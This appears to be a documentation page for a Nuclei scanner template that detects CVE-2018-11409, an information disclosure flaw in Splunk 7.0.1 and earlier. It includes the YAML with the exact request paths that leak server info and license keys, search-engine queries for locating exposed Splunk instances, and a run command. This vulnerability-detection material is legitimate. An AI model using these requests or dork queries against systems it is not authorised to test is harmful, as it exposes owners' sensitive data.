Skip to content
Nuclei Templates

Splunk <=7.0.1 - Information Disclosure

ID: CVE-2018-11409

Severity: medium

Author: harshbothra_

Tags: cve,cve2018,edb,splunk

Description

Section titled “Description”

Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.

YAML Source

Section titled “YAML Source”
id: CVE-2018-11409


info:
  name: Splunk <=7.0.1 - Information Disclosure
  author: harshbothra_
  severity: medium
  description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.
  reference:
    - https://github.com/kofa2002/splunk
    - https://www.exploit-db.com/exploits/44865/
    - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11409
    - http://www.securitytracker.com/id/1041148
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-11409
    cwe-id: CWE-200
    epss-score: 0.83856
    epss-percentile: 0.98466
    cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: splunk
    product: splunk
    shodan-query: http.title:"login - splunk"
    fofa-query: title="login - splunk"
    google-query: intitle:"login - splunk"
  tags: cve,cve2018,edb,splunk


http:
  - method: GET
    path:
      - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
      - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'


    matchers-condition: and
    matchers:
      - type: word
        words:
          - licenseKeys


      - type: status
        status:
          - 200
# digest: 490a0046304402203561fc076c1c504b5cd1272ad54b3bb1fbe5bf9a64dcf05e542e45a7b451d64002202c8eff9f5bc58701d0abdb990fd3b6f8a13d28496384de96e13f5f09ba1c253a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-11409.yaml"

View on Github